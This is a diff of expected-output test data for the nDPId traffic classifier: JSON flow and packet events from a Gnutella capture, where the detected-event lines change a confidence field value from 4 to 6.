00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":95216,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95216,"pkt":"UlQAEjUCCAAn5uVZCABFAABtOX8AAIAR2+8KAAIPSMnQOXAJltkAWSBpTGIxAqnQz8i8hdkTM6c6p0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1222,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95216,"flow_last_seen":95216,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95216,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.201.208.57","src_port":28681,"dst_port":38617,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1222,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95216,"flow_last_seen":95216,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95216,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.201.208.57","src_port":28681,"dst_port":38617,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1223,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95264,"flow_last_seen":95264,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95264,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":40137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":1,"flow_last_seen":95264,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95264,"pkt":"UlQAEjUCCAAn5uVZCABFAABteh0AAIARB1oKAAIPUc1bLXAJnMkAWTuNUisxAvjRH\/hajsQp0x+4CkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1223,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95264,"flow_last_seen":95264,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95264,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":40137,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1223,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95264,"flow_last_seen":95264,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95264,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":40137,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1224,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95264,"flow_last_seen":95264,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95264,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.220.186.140","src_port":28681,"dst_port":27641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1224,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":1,"flow_last_seen":95264,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95264,"pkt":"UlQAEjUCCAAn5uVZCABFAABtBMUAAIARP0QKAAIPL9y6jHAJa\/kAWcmWUFgxAsm+7Dhb\/+NPw\/hwmEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95264,"flow_last_seen":95264,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95264,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.220.186.140","src_port":28681,"dst_port":27641,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95264,"flow_last_seen":95264,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95264,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.220.186.140","src_port":28681,"dst_port":27641,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01410{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1225,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":2,"flow_last_seen":95411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":95411,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBAUAAEARfX4v3LqMCgACD2v5cAkC33tEUFgxAsm+7Dhb\/+NPw\/hwmEQAAMACAAAGR1RLRwAAapTkMLTCnHtO3\/4C25AmQ4OUYisEL9y6jGv5AQAAAAR8wXsRFEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegldTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtUw=="} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1226,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":3,"flow_last_seen":95412,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95412,"pkt":"UlQAEjUCCAAn5uVZCABFAABtYpsAAIARi98KAAIPwSB+1nAJ6MwAWeiNeJExAmLu0Xk4X2RsSVj1uUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1228,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95443,"flow_last_seen":95443,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95443,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.240.69.199","src_port":28681,"dst_port":6348,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1228,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":1,"flow_last_seen":95443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95443,"pkt":"UlQAEjUCCAAn5uVZCABFAABtP0UAAIARMnUKAAIPdvBFx3AJGMwAWTV1zcQxAjBRcglTz+ngOj6nIkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1228,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95443,"flow_last_seen":95443,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95443,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.240.69.199","src_port":28681,"dst_port":6348,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1228,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95443,"flow_last_seen":95443,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95443,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.240.69.199","src_port":28681,"dst_port":6348,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1230,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":3,"flow_last_seen":95653,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":95653,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0sx9AAIAG7QUKAAIPUrX72sRljhBQLtKuAAAAAIAC+vCkLQAAAgQFtAEDAwgBAQQC"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":3,"flow_last_seen":95653,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":95653,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0vENAAIAGZKwKAAIPcfxbycRnEMmMdJG3AAAAAIAC+vCm7gAAAgQFtAEDAwgBAQQC"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1232,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":3,"flow_last_seen":95653,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":95653,"pkt":"UlQAEjUCCAAn5uVZCABFAAA04CVAAIAGre0KAAIPJOc7u8Rm8xqBNdLHAAAAAIAC+vD77wAAAgQFtAEDAwgBAQQC"} @@ -1043,64 +1043,64 @@ 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1237,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":3,"flow_last_seen":95685,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95685,"pkt":"UlQAEjUCCAAn5uVZCABFAABtBMYAAIARP0MKAAIPL9y6jHAJa\/kAWT8LpTgxAh8vpCECmjOT1kHZjEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1239,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95715,"flow_last_seen":95715,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95715,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.188.98","src_port":28681,"dst_port":62851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1239,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":1,"flow_last_seen":95715,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95715,"pkt":"UlQAEjUCCAAn5uVZCABFAABtSkUAAIARukUKAAIPbYS8YnAJ9YMAWQnlOt4xAkt+phdWa3WZX\/1iLEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1239,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95715,"flow_last_seen":95715,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95715,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.188.98","src_port":28681,"dst_port":62851,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1239,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95715,"flow_last_seen":95715,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95715,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.188.98","src_port":28681,"dst_port":62851,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1240,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95716,"flow_last_seen":95716,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95716,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":1,"flow_last_seen":95716,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95716,"pkt":"UlQAEjUCCAAn5uVZCABFAABtyVMAAIARg0EKAAIPGKfJNXAJuLIAWdvQozIxAmeG11K2Zk+mg8cBskQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1240,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95716,"flow_last_seen":95716,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95716,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1240,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95716,"flow_last_seen":95716,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95716,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1241,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95716,"flow_last_seen":95716,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95716,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1241,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":1,"flow_last_seen":95716,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95716,"pkt":"UlQAEjUCCAAn5uVZCABFAABtGLgAAIARtUEKAAIPsGOwFHAJGMoAWdWFw\/gxApkT0lWtd136yOWRcEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1241,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95716,"flow_last_seen":95716,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95716,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1241,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95716,"flow_last_seen":95716,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95716,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01405{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1242,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":2,"flow_last_seen":95753,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":95753,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBAoAAEARPftthLxiCgACD\/WDcAkC3zUCOt4xAkt+phdWa3WZX\/1iLEQAAMACAAAGR1RLRwAA4JsjIdkeuStic2CcxenuP1eRs7wEbYS8YvWDAQAAAATOKYIxFFdTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAPsDRyUcIF2wLlroEqQFEsSbAhy\/BF42QlL4lUdUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSA=="} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":3,"flow_last_seen":95754,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95754,"pkt":"UlQAEjUCCAAn5uVZCABFAABtBlcAAIAREjIKAAIPaO6s+nAJW\/wAWVUmk6UxAqo+0NIYX4FTPMU3uEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1244,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95754,"flow_last_seen":95754,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95754,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"71.237.202.91","src_port":28681,"dst_port":16117,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 